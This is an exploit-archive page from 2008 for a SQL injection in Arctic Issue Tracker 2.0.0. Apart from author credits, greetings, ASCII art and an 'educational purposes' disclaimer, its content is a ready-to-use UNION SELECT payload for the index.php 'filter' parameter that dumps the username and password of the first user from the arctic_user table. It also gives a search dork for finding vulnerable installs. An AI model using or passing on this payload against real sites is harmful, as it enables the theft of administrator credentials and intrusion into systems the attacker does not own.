Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Artic Issue Tracker 2.0.0 (index.php filter) SQL Injection Vulnerability
# Published : 2008-07-17
# Author : QTRinux
# Previous Title : preCMS v.1 (index.php page) Remote SQL injection Vulnerability
# Next Title : PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

IloveYouTryaG
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
|     _                   __           __       __          ______     |
|   /'             __  /'__`        / __  /'__`       /  ___    |
|  /_,     ___   /_/_L     ___  ,_/ /   _ __  __/    |
|  /_/  /' _ ` / /_/__<_  /'___  /    /`'__ ___``  |
|       / /    / L / __/  _  _   / / L  |
|       _ _ __   ____/ ____\ __\ ____/ _   ____/ |
|       /_//_//_/ _ /___/  /____/ /__/ /___/  /_/   /___/  |
|                   ____/ >> Kings of injection                      |
|                   /___/                                             |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
Title  ::   Remote SQL Injection
 
Author ::   QTRinu x [ Qataro (at) hotmail (dot) Com ]
Application  ::  Arctic Issue Tracker v2.0.0
 
Download ::   http://www.arctictracker.com
Price    ::  $99.95 USD
Dork 1   ::  Powered by Arctic v2.0.0
 
ShoutZ   :: Allah ,InJecTor,AlQaTaRi,all InjEctOr5 TeaM ,TrYaG TeaM & Muslims Hackers
Terms of use :: This exploit is just for educational purposes, DO NOT use it for illegal acts.
--------------------------------------------[C o n t e x t]-----------------------------------------
 
Vulnerability: http:// Localhost / (Path Script) / index.php?filter= [SQL]

SQL  : -1%20union%20select%201,2,3,concat(username,0x3a,password),5%20from%20arctic_user%20where%20id=1--
 
-------------------------------------------[End of  context]----------------------------------------
thanx str0ke/*

# www.Syue.com [2008-07-17]